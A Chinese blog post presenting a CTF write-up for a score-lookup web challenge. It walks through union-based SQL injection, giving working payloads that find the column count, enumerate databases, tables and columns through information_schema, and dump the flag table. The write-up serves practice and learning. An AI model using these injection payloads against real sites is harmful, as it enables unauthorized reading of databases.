美文网首页
ctf | web 查成绩

ctf | web 查成绩

作者: 你可以叫我风平 | 来源:发表于2018-11-17 16:48 被阅读0次

这是一道练习SQL注入非常好的题,加上楼主最近也在看SQL注入,就和大家一起分享这道题。

先上图

我们先随便输两个数上去,发现并没有什么异常,数据库里有三个同学的成绩。我们还是按步骤来,源码,抓包,但是都无果。

            我们再来仔细观察这个页面,这是一个查询界面,是不是可以查到flag呢?不同于以往在浏览器搜索栏里注入,我们在页面的查询框里直接注入,先试试?id=1' 查询不到页面,再试试联合注入 ?id=-1' union select 1,2,3#

发现还是没有,但是当我们觉得方法路子是对的时候一定要多尝试,但如果路子不对,那努力就是白费。

但是这一题,显然我们的路子是对的,我们在后面多加个4。 ?id=-1' union select 1,2,3,4#

哈哈哈,我们的注入点出来啦!

下面就是走个流程了,代码在下面。

先查库:?id=-1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata#

(?id=-1' union select 1,database(),3,4#)

选择skctf_flag

再查表:?id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="skctf_flag"#

选择fl4g

再查列:?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="fl4g"#

列和库重名,但是没关系。

最后我们查这一列的数据:?id=-1' union select 1,group_concat(skctf_flag),3,4 from skctf_flag.fl4g#

这道题到这就结束了,代码尽量自己手打,增强理解。

喜欢的朋友不要忘了点个关注哦!

相关文章

  • ctf | web 查成绩

    这是一道练习SQL注入非常好的题,加上楼主最近也在看SQL注入,就和大家一起分享这道题。 先上图 我们先随便输两个...

  • [CTF_web]exec/exec3.php

    CTF_web CTF_web 源码如下 : 分析 利用代码 :

  • 南京邮电ctf-CG-CTF—WEB—WriteUp(持续更新)

    南京邮电ctf-CG-CTF—WEB—WriteUp(持续更新) 南京邮电练习题-CTF练习题 web篇 1.签到...

  • Wpsec CTF Web部分Write Up

    CTF之浅谈Web 因水平有限,欢迎指导交流。 网站:ctf.onlykood.com 团队:WPSEC WEB部...

  • [CTF_web]exec/exec1.php

    CTF_web CTF_web 源码如下 : php exec 函数可以同时执行多个命令 , 只需要用 \n 分隔...

  • CTF_Web_WriteUp

    南邮CTF web write up, 题目是按分数从少到多顺序排列,后续有新的体会会更新 签到题 签到二 右键查...

  • 实验吧web-登陆一下好吗??

    题目地址:http://ctf5.shiyanbar.com/web/wonderkun/web/index.ht...

  • [CTF_web]exec/exec2.php

    CTF_web CTF_web 源码如下 : 这个题目的缺陷在于 :正则中并没有使用 $ 来限制字符串的结束因此只...

  • Web

    这是 ISITDTU 的一些 web 题目 来自 ISITDTU CTF 2018 部分Web题目Writeup这...

  • [*ctf] web writeup

    小菜鸡又来更新writeup了这次的web我觉得更像是逆向。。。果然复旦的大佬都是全栈高手。。。根本就是。。 si...

网友评论

      本文标题:ctf | web 查成绩

      本文链接:https://www.haomeiwen.com/subject/bvfifqtx.html